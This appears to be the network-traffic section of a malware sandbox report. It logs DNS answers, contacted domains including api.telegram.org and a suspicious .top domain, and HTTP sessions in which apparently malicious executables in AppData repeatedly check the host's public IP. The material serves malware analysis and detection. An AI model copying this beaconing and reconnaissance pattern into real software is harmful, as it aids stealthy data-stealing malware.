                                              Jul 26, 2024 23:45:36.466989040 CEST8.8.8.8192.168.2.220x5323No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.466989040 CEST8.8.8.8192.168.2.220x5323No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.624397993 CEST8.8.8.8192.168.2.220x1d8fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.624397993 CEST8.8.8.8192.168.2.220x1d8fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.624397993 CEST8.8.8.8192.168.2.220x1d8fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.624397993 CEST8.8.8.8192.168.2.220x1d8fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.624397993 CEST8.8.8.8192.168.2.220x1d8fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.624397993 CEST8.8.8.8192.168.2.220x1d8fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.725044966 CEST8.8.8.8192.168.2.220xfd5dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.725044966 CEST8.8.8.8192.168.2.220xfd5dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.725044966 CEST8.8.8.8192.168.2.220xfd5dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.725044966 CEST8.8.8.8192.168.2.220xfd5dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.725044966 CEST8.8.8.8192.168.2.220xfd5dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.725044966 CEST8.8.8.8192.168.2.220xfd5dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.774833918 CEST8.8.8.8192.168.2.220xa5e4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.774833918 CEST8.8.8.8192.168.2.220xa5e4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.774833918 CEST8.8.8.8192.168.2.220xa5e4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.774833918 CEST8.8.8.8192.168.2.220xa5e4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.774833918 CEST8.8.8.8192.168.2.220xa5e4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.774833918 CEST8.8.8.8192.168.2.220xa5e4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:37.871150017 CEST8.8.8.8192.168.2.220xa29aNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:37.871150017 CEST8.8.8.8192.168.2.220xa29aNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.771265030 CEST8.8.8.8192.168.2.220xbb4cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.771265030 CEST8.8.8.8192.168.2.220xbb4cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.771265030 CEST8.8.8.8192.168.2.220xbb4cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.771265030 CEST8.8.8.8192.168.2.220xbb4cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.771265030 CEST8.8.8.8192.168.2.220xbb4cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.771265030 CEST8.8.8.8192.168.2.220xbb4cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.842966080 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.842966080 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.842966080 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.842966080 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.842966080 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.842966080 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.863590002 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.863590002 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.863590002 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.863590002 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.863590002 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.863590002 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:40.735959053 CEST8.8.8.8192.168.2.220x3cadNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:40.735959053 CEST8.8.8.8192.168.2.220x3cadNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.401194096 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.401194096 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.401194096 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.401194096 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.401194096 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.401194096 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.407588005 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.407588005 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.407588005 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.407588005 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.407588005 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.407588005 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.419262886 CEST8.8.8.8192.168.2.220xc693No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.419262886 CEST8.8.8.8192.168.2.220xc693No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.419262886 CEST8.8.8.8192.168.2.220xc693No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.419262886 CEST8.8.8.8192.168.2.220xc693No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.419262886 CEST8.8.8.8192.168.2.220xc693No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.419262886 CEST8.8.8.8192.168.2.220xc693No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.535531044 CEST8.8.8.8192.168.2.220xafa5No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.535531044 CEST8.8.8.8192.168.2.220xafa5No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.542736053 CEST8.8.8.8192.168.2.220xafa5No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.542736053 CEST8.8.8.8192.168.2.220xafa5No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.186707020 CEST8.8.8.8192.168.2.220xfa66No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.186707020 CEST8.8.8.8192.168.2.220xfa66No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.257505894 CEST8.8.8.8192.168.2.220xfa66No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.257505894 CEST8.8.8.8192.168.2.220xfa66No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.486668110 CEST8.8.8.8192.168.2.220x6749No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.486668110 CEST8.8.8.8192.168.2.220x6749No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.486668110 CEST8.8.8.8192.168.2.220x6749No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.486668110 CEST8.8.8.8192.168.2.220x6749No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.486668110 CEST8.8.8.8192.168.2.220x6749No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.486668110 CEST8.8.8.8192.168.2.220x6749No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.532221079 CEST8.8.8.8192.168.2.220xc764No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.532221079 CEST8.8.8.8192.168.2.220xc764No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.532221079 CEST8.8.8.8192.168.2.220xc764No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.532221079 CEST8.8.8.8192.168.2.220xc764No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.532221079 CEST8.8.8.8192.168.2.220xc764No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.532221079 CEST8.8.8.8192.168.2.220xc764No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.540035009 CEST8.8.8.8192.168.2.220xf05dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.540035009 CEST8.8.8.8192.168.2.220xf05dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.540035009 CEST8.8.8.8192.168.2.220xf05dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.540035009 CEST8.8.8.8192.168.2.220xf05dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.540035009 CEST8.8.8.8192.168.2.220xf05dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.540035009 CEST8.8.8.8192.168.2.220xf05dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.543221951 CEST8.8.8.8192.168.2.220x916No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.543221951 CEST8.8.8.8192.168.2.220x916No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.543221951 CEST8.8.8.8192.168.2.220x916No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.543221951 CEST8.8.8.8192.168.2.220x916No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.543221951 CEST8.8.8.8192.168.2.220x916No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.543221951 CEST8.8.8.8192.168.2.220x916No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:43.339736938 CEST8.8.8.8192.168.2.220x49fbNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:43.339736938 CEST8.8.8.8192.168.2.220x49fbNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.136018991 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.136018991 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.136018991 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.136018991 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.136018991 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.136018991 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.328207016 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.328207016 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.328207016 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.328207016 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.328207016 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.328207016 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.412067890 CEST8.8.8.8192.168.2.220x68beNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.412067890 CEST8.8.8.8192.168.2.220x68beNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.412067890 CEST8.8.8.8192.168.2.220x68beNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.412067890 CEST8.8.8.8192.168.2.220x68beNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.412067890 CEST8.8.8.8192.168.2.220x68beNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.412067890 CEST8.8.8.8192.168.2.220x68beNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.418123960 CEST8.8.8.8192.168.2.220x6dc6No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.418123960 CEST8.8.8.8192.168.2.220x6dc6No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.075834036 CEST8.8.8.8192.168.2.220x2ef7No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.075834036 CEST8.8.8.8192.168.2.220x2ef7No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.164971113 CEST8.8.8.8192.168.2.220xc927No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.164971113 CEST8.8.8.8192.168.2.220xc927No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.164971113 CEST8.8.8.8192.168.2.220xc927No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.164971113 CEST8.8.8.8192.168.2.220xc927No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              • meridianresourcellc.top
                                              • reallyfreegeoip.org
                                              • api.telegram.org
                                              • checkip.dyndns.org
                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.22 | 49171 | 132.226.247.73 | 80 | 3880 | C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 23:45:28.321165085 CEST | 151 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:28.967530012 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cf369e6b2e2ee83bcbc681c3b73cd316
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:29.175510883 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cf369e6b2e2ee83bcbc681c3b73cd316
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:30.462775946 CEST | 127 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:30.671293020 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9bfbb0a10ff96123f322d45128c1a25c
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:30.886786938 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9bfbb0a10ff96123f322d45128c1a25c
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:34.019804955 CEST | 127 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:34.230139017 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: daff2905da8d2155d078d7adf0b6b577
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:34.439461946 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: daff2905da8d2155d078d7adf0b6b577
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.22 | 49174 | 193.122.130.0 | 80 | 3880 | C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 23:45:35.209233046 CEST | 127 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:35.669509888 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:35 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cc568803fb6a289f7cb542e227592f1e
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.22 | 49176 | 158.101.44.242 | 80 | 2060 | C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 23:45:36.649858952 CEST | 151 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:37.202109098 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8442a7ac0e46db336ba63d2e8e2667e1
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:37.415529966 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8442a7ac0e46db336ba63d2e8e2667e1
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:37.488856077 CEST | 127 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:37.848849058 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8a762f5a7b51b7db456e12570a1407e6
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:38.902432919 CEST | 127 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:39.061602116 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:38 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 29dfd82e1771c59777ec83c4e67431ee
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              3 | 192.168.2.22 | 49177 | 193.122.6.168 | 80 | 3880 | C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 23:45:36.780706882 CEST | 127 | OUT | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:39.412964106 CEST | 730 | IN | HTTP/1.1 502 Bad Gateway
                                              Date: Fri, 26 Jul 2024 21:45:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 547
                                              Connection: keep-alive
                                              X-Request-ID: 16364d37ae25a9fe5ccbe2cb99c6ccce
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                              Jul 26, 2024 23:45:39.432930946 CEST  127  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:40.719506025 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:40 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c34cc12915724a1e95970801e2af4caa
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:40.927472115 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:40 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c34cc12915724a1e95970801e2af4caa
